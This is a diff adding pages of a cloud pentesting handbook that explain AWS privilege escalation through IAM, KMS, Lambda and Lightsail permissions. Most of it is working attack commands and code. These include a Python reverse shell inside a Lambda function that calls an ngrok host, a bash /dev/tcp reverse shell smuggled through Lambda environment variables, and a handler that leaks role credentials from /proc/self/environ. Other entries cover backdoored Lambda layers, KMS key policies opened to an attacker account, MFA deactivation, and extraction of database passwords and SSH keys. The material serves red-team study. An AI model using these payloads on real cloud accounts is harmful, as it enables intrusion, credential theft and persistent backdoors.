+{% code overflow="wrap" %}
+```bash
+aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>
+```
+{% endcode %}
+
+**Impact:** Direct privilege escalation within the user's service permissions.
+
+### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**
+
+Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.
+
+**Exploit for User:**
+
+```bash
+aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"
+```
+
+**Exploit for Group:**
+
+```bash
+aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"
+```
+
+**Impact:** Direct privilege escalation to anything the policy grants.
+
+### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
+
+Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions.
+
+**Exploit for Role:**
+
+```bash
+aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"
+```
+
+**Exploit for Inline Policies:**
+
+```bash
+aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
+    --policy-document "file:///path/to/policy.json"
+
+aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
+    --policy-document file:///path/to/policy.json
+
+aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
+    --policy-document file:///path/to/policy.json
+```
+
+You can use a policy like:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Action": [
+                "*"
+            ],
+            "Resource": [
+                "*"
+            ]
+        }
+    ]
+}
+```
+
+**Impact:** Direct privilege escalation by adding permissions through policies.
+
+### **`iam:AddUserToGroup`**
+
+Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions.
+
+**Exploit:**
+
+{% code overflow="wrap" %}
+```bash
+aws iam add-user-to-group --group-name <group_name> --user-name <username>
+```
+{% endcode %}
+
+**Impact:** Direct privilege escalation to the level of the group's permissions.
+
+### **`iam:UpdateAssumeRolePolicy`**
+
+Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions.
+
+**Exploit:**
+
+```bash
+aws iam update-assume-role-policy --role-name <role_name> \
+    --policy-document file:///path/to/assume/role/policy.json
+```
+
+Where the policy looks like the following, which gives the user permission to assume the role:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Action": "sts:AssumeRole",
+            "Principal": {
+                "AWS": "$USER_ARN"
+            }
+        }
+    ]
+}
+```
+
+**Impact:** Direct privilege escalation by assuming any role's permissions.
+
+### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**
+
+Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation.
+
+**Exploit for SSH Key Upload:**
+
+```bash
+aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>
+```
+
+**Exploit for MFA Deactivation:**
+
+```bash
+aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>
+```
+
+**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection.
+
+### **`iam:ResyncMFADevice`**
+
+Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection.
+
+**Bash Command:**
+
+```bash
+aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
+    --authentication-code1 <code1> --authentication-code2 <code2>
+```
+
+**Impact:** Indirect privilege escalation by adding or manipulating MFA devices.
+
+### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)
+
+With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it.
+
+Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back
+
+```bash
+# List SAMLs
+aws iam list-saml-providers
+
+# Optional: Get SAML provider XML
+aws iam get-saml-provider --saml-provider-arn <ARN>
+
+# Update SAML provider
+aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>
+
+## Login impersonating roles that trust the SAML provider
+
+# Optional: Set the previous XML back
+aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>
+```
+
+{% hint style="info" %}
+TODO: A Tool capable of generating the SAML metadata and login with a specified role
+{% endhint %}
+
+### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)
+
+(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider.
+
+{% code overflow="wrap" %}
+```bash
+# List providers
+aws iam list-open-id-connect-providers
+# Optional: Get Thumbprints used to not delete them
+aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
+# Update Thumbprints (The thumbprint is always a 40-character string)
+aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
+```
+{% endcode %}
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
new file mode 100644
index 0000000000..ccd34ffa80
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
@@ -0,0 +1,154 @@
+# AWS - KMS Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS
+
+For more info about KMS check:
+
+{% content-ref url="../aws-services/aws-kms-enum.md" %}
+[aws-kms-enum.md](../aws-services/aws-kms-enum.md)
+{% endcontent-ref %}
+
+### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)
+
+With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone:
+
+{% code overflow="wrap" %}
+```bash
+aws kms list-keys
+aws kms list-key-policies --key-id <id> # Although only 1 max per key
+aws kms get-key-policy --key-id <id> --policy-name <policy_name>
+# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
+aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json
+```
+{% endcode %}
+
+policy.json:
+
+```json
+{
+    "Version" : "2012-10-17",
+    "Id" : "key-consolepolicy-3",
+    "Statement" : [ 
+        {
+            "Sid" : "Enable IAM User Permissions",
+            "Effect" : "Allow",
+            "Principal" : {
+                "AWS" : "arn:aws:iam::<origin_account>:root"
+            },
+            "Action" : "kms:*",
+            "Resource" : "*"
+        }, 
+        {
+            "Sid" : "Allow all use",
+            "Effect" : "Allow",
+            "Principal" : {
+                "AWS" : "arn:aws:iam::<attackers_account>:root"
+            },
+            "Action" : [ "kms:*" ],
+            "Resource" : "*"
+        }
+    ]
+}
+```
+
+### `kms:CreateGrant`
+
+It **allows a principal to use a KMS key:**
+
+```bash
+aws kms create-grant \
+    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
+    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
+    --operations Decrypt
+```
+
+{% hint style="warning" %}
+A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+{% endhint %}
+
+{% hint style="warning" %}
+Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\
+However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\
+For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
+{% endhint %}
+
+```bash
+# Use the grant token in a request
+aws kms generate-data-key \
+    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
+    –-key-spec AES_256 \
+    --grant-tokens $token
+```
+
+Note that it's possible to list grant of keys with:
+
+```bash
+aws kms list-grants --key-id <value>
+```
+
+### `kms:CreateKey`, `kms:ReplicateKey`
+
+With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.
+
+So, an attacker could abuse this to obtain privesc his access to the key and use it
+
+{% code overflow="wrap" %}
+```bash
+aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
+
+{
+    "Version": "2012-10-17",
+    "Id": "key-consolepolicy-3",
+    "Statement": [
+        {
+            "Sid": "Enable IAM User Permissions",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "*"
+            },
+            "Action": "kms:*",
+            "Resource": "*"
+        }
+    ]
+}
+```
+{% endcode %}
+
+### `kms:Decrypt`
+
+This permission allows to use a key to decrypt some information.\
+For more information check:
+
+{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %}
+[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
new file mode 100644
index 0000000000..57b23ef344
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
@@ -0,0 +1,329 @@
+# AWS - Lambda Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## lambda
+
+More info about lambda in:
+
+{% content-ref url="../aws-services/aws-lambda-enum.md" %}
+[aws-lambda-enum.md](../aws-services/aws-lambda-enum.md)
+{% endcontent-ref %}
+
+### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
+
+Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\
+They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\
+Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\
+
+A attacker could abuse this to get a **rev shell and steal the token**:
+
+{% code title="rev.py" %}
+```python
+import socket,subprocess,os,time
+def lambda_handler(event, context):
+   s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
+   s.connect(('4.tcp.ngrok.io',14305))
+   os.dup2(s.fileno(),0)
+   os.dup2(s.fileno(),1)
+   os.dup2(s.fileno(),2)
+   p=subprocess.call(['/bin/sh','-i'])
+   time.sleep(900)
+   return 0
+```
+{% endcode %}
+
+```bash
+# Zip the rev shell
+zip "rev.zip" "rev.py"
+
+# Create the function
+aws lambda create-function --function-name my_function \
+    --runtime python3.9 --role <arn_of_lambda_role> \
+    --handler rev.lambda_handler --zip-file fileb://rev.zip
+
+# Invoke the function
+aws lambda invoke --function-name my_function output.txt
+## If you have the lambda:InvokeFunctionUrl permission you need to expose the lambda inan URL and execute it via the URL
+
+# List roles
+aws iam list-attached-user-policies --user-name <user-name>
+```
+
+You could also **abuse the lambda role permissions** from the lambda function itself.\
+If the lambda role had enough permissions you could use it to grant admin rights to you:
+
+```python
+import boto3
+def lambda_handler(event, context):
+    client = boto3.client('iam')
+    response = client.attach_user_policy(
+        UserName='my_username',
+        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
+    )
+    return response
+```
+
+It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda.
+
+```python
+def handler(event, context):
+    sessiontoken = open('/proc/self/environ', "r").read()
+    return {
+        'statusCode': 200,
+        'session': str(sessiontoken)
+    }
+```
+
+```bash
+aws lambda invoke --function-name <lambda_name> output.txt
+cat output.txt
+```
+
+**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+
+{% hint style="danger" %}
+Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction`
+{% endhint %}
+
+### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
+
+Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`**
+
+```bash
+# Check the previous exploit and use the following line to grant you the invoke permissions
+aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
+   --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
+```
+
+**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+
+### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`
+
+Users with **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:CreateEventSourceMapping`** permissions (and potentially `dynamodb:PutItem` and `dynamodb:CreateTable`) can indirectly **escalate privileges** even without `lambda:InvokeFunction`.\
+They can create a **Lambda function with malicious code and assign it an existing IAM role**.
+
+Instead of directly invoking the Lambda, the user sets up or utilizes an existing DynamoDB table, linking it to the Lambda through an event source mapping. This setup ensures the Lambda function is **triggered automatically upon a new item** entry in the table, either by the user's action or another process, thereby indirectly invoking the Lambda function and executing the code with the permissions of the passed IAM role.
+
+```bash
+aws lambda create-function --function-name my_function \
+    --runtime python3.8 --role <arn_of_lambda_role> \
+    --handler lambda_function.lambda_handler \
+    --zip-file fileb://rev.zip
+```
+
+If DynamoDB is already active in the AWS environment, the user only **needs to establish the event source mapping** for the Lambda function. However, if DynamoDB isn't in use, the user must **create a new table** with streaming enabled:
+
+```bash
+aws dynamodb create-table --table-name my_table \
+    --attribute-definitions AttributeName=Test,AttributeType=S \
+    --key-schema AttributeName=Test,KeyType=HASH \
+    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+    --stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES
+```
+
+Now it's posible **connect the Lambda function to the DynamoDB table** by **creating an event source mapping**:
+
+```bash
+aws lambda create-event-source-mapping --function-name my_function \
+    --event-source-arn <arn_of_dynamodb_table_stream> \
+    --enabled --starting-position LATEST
+```
+
+With the Lambda function linked to the DynamoDB stream, the attacker can **indirectly trigger the Lambda by activating the DynamoDB stream**. This can be accomplished by **inserting an item** into the DynamoDB table:
+
+```bash
+aws dynamodb put-item --table-name my_table \
+    --item Test={S="Random string"}
+```
+
+**Potential Impact:** Direct privesc to the lambda service role specified.
+
+### `lambda:AddPermission`
+
+An attacker with this permission can **grant himself (or others) any permissions** (this generates resource based policies to grant access to the resource):
+
+{% code overflow="wrap" %}
+```bash
+# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
+aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>
+
+# Invoke the function
+aws lambda invoke --function-name <func_name> /tmp/outout
+```
+{% endcode %}
+
+**Potential Impact:** Direct privesc to the lambda service role used by granting permission to modify the code and run it.
+
+### `lambda:AddLayerVersionPermission`
+
+An attacker with this permission can **grant himself (or others) the permission `lambda:GetLayerVersion`**. He could access the layer and search for vulnerabilities or sensitive information
+
+{% code overflow="wrap" %}
+```bash
+# Give everyone the permission lambda:GetLayerVersion
+aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion
+```
+{% endcode %}
+
+**Potential Impact:** Potential access to sensitive information.
+
+### `lambda:UpdateFunctionCode`
+
+Users holding the **`lambda:UpdateFunctionCode`** permission has the potential to **modify the code of an existing Lambda function that is linked to an IAM role.**\
+The attacker can **modify the code of the lambda to exfiltrate the IAM credentials**.
+
+Although the attacker might not have the direct ability to invoke the function, if the Lambda function is pre-existing and operational, it's probable that it will be triggered through existing workflows or events, thus indirectly facilitating the execution of the modified code.
+
+{% code overflow="wrap" %}
+```bash
+# The zip should contain the lambda code (trick: Download the current one and add your code there)
+aws lambda update-function-code --function-name target_function \
+    --zip-file fileb:///my/lambda/code/zipped.zip
+
+# If you have invoke permissions:
+aws lambda invoke --function-name my_function output.txt
+
+# If not check if it's exposed in any URL or via an API gateway you could access
+```
+{% endcode %}
+
+**Potential Impact:** Direct privesc to the lambda service role used.
+
+### `lambda:UpdateFunctionConfiguration`
+
+#### RCE via env variables
+
+With this permissions it's possible to add environment variables that will cause the Lambda to execute arbitrary code. For example in python it's possible to abuse the environment variables `PYTHONWARNING` and `BROWSER` to make a python process execute arbitrary commands:
+
+{% code overflow="wrap" %}
+```bash
+aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"
+```
+{% endcode %}
+
+For other scripting languages there are other env variables you can use. For more info check the subsections of scripting languages in:
+
+{% embed url="https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse" %}
+
+#### RCE via Lambda Layers
+
+[**Lambda Layers**](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) allows to include **code** in your lamdba function but **storing it separately**, so the function code can stay small and **several functions can share code**.
+
+Inside lambda you can check the paths from where python code is loaded with a function like the following:
+
+```python
+import json
+import sys
+
+def lambda_handler(event, context):
+    print(json.dumps(sys.path, indent=2))
+```
+
+These are the places:
+
+1. /var/task
+2. /opt/python/lib/python3.7/site-packages
+3. /opt/python
+4. /var/runtime
+5. /var/lang/lib/python37.zip
+6. /var/lang/lib/python3.7
+7. /var/lang/lib/python3.7/lib-dynload
+8. /var/lang/lib/python3.7/site-packages
+9. /opt/python/lib/python3.7/site-packages
+10. /opt/python
+
+For example, the library boto3 is loaded from `/var/runtime/boto3` (4th position).
+
+#### Exploitation
+
+It's possible to abuse the permission `lambda:UpdateFunctionConfiguration` to **add a new layer** to a lambda function. To execute arbitrary code this layer need to contain some **library that the lambda is going to import.** If you can read the code of the lambda, you could find this easily, also note that it might be possible that the lambda is **already using a layer** and you could **download** the layer and **add your code** in there.
+
+For example, lets suppose that the lambda is using the library boto3, this will create a local layer with the last version of the library:
+
+```bash
+pip3 install -t ./lambda_layer boto3
+```
+
+You can open `./lambda_layer/boto3/__init__.py` and **add the backdoor in the global code** (a function to exfiltrate credentials or get a reverse shell for example).
+
+Then, zip that `./lambda_layer` directory and **upload the new lambda layer** in your own account (or in the victims one, but you might not have permissions for this).\
+Note that you need to create a python folder and put the libraries in there to override /opt/python/boto3. Also, the layer needs to be **compatible with the python version** used by the lambda and if you upload it to your account, it needs to be in the **same region:**
+
+{% code overflow="wrap" %}
+```bash
+aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"
+```
+{% endcode %}
+
+Now, make the uploaded lambda layer **accessible by any account**:
+
+```bash
+aws lambda add-layer-version-permission --layer-name boto3 \
+    --version-number 1 --statement-id public \
+    --action lambda:GetLayerVersion --principal *
+```
+
+And attach the lambda layer to the victim lambda function:
+
+```bash
+aws lambda update-function-configuration \
+    --function-name <func-name> \
+    --layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
+    --timeout 300 #5min for rev shells
+```
+
+The next step would be to either **invoke the function** ourselves if we can or to wait until i**t gets invoked** by normal means–which is the safer method.
+
+A **more stealth way to exploit this vulnerability** can be found in:
+
+{% content-ref url="../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md" %}
+[aws-lambda-layers-persistence.md](../aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md)
+{% endcontent-ref %}
+
+**Potential Impact:** Direct privesc to the lambda service role used.
+
+### `iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`
+
+Maybe with those permissions you are able to create a function and execute it calling the URL... but I could find a way to test it, so let me know if you do!
+
+### Lambda MitM
+
+Some lambdas are going to be **receiving sensitive info from the users in parameters.** If get RCE in one of them, you can exfiltrate the info other users are sending to it, check it in:
+
+{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md" %}
+[aws-warm-lambda-persistence.md](../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
+* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
new file mode 100644
index 0000000000..95ec107578
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md
@@ -0,0 +1,195 @@
+# AWS - Lightsail Privesc
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lightsail
+
+For more information about Lightsail check:
+
+{% content-ref url="../aws-services/aws-lightsail-enum.md" %}
+[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md)
+{% endcontent-ref %}
+
+{% hint style="warning" %}
+It’s important to note that Lightsail **doesn’t use IAM roles belonging to the user** but to an AWS managed account, so you can’t abuse this service to privesc. However, **sensitive data** such as code, API keys and database info could be found in this service.
+{% endhint %}
+
+### `lightsail:DownloadDefaultKeyPair`
+
+This permission will allow you to get the SSH keys to access the instances:
+
+```
+aws lightsail download-default-key-pair
+```
+
+**Potential Impact:** Find sensitive info inside the instances.
+
+### `lightsail:GetInstanceAccessDetails`
+
+This permission will allow you to generate SSH keys to access the instances:
+
+```bash
+aws lightsail get-instance-access-details --instance-name <instance_name>
+```
+
+**Potential Impact:** Find sensitive info inside the instances.
+
+### `lightsail:CreateBucketAccessKey`
+
+This permission will allow you to get a key to access the bucket:
+
+```bash
+aws lightsail create-bucket-access-key --bucket-name <name>
+```
+
+**Potential Impact:** Find sensitive info inside the bucket.
+
+### `lightsail:GetRelationalDatabaseMasterUserPassword`
+
+This permission will allow you to get the credentials to access the database:
+
+```bash
+aws lightsail get-relational-database-master-user-password --relational-database-name <name>
+```
+
+**Potential Impact:** Find sensitive info inside the database.
+
+### `lightsail:UpdateRelationalDatabase`
+
+This permission will allow you to change the password to access the database:
+
+{% code overflow="wrap" %}
+```bash
+aws lightsail update-relational-database --relational-database-name <name> --master-user-password <strong_new_password>
+```
+{% endcode %}
+
+If the database isn't public, you could also make it public with this permissions with
+
+{% code overflow="wrap" %}
+```bash
+aws lightsail update-relational-database --relational-database-name <name> --publicly-accessible
+```
+{% endcode %}
+
+**Potential Impact:** Find sensitive info inside the database.
+
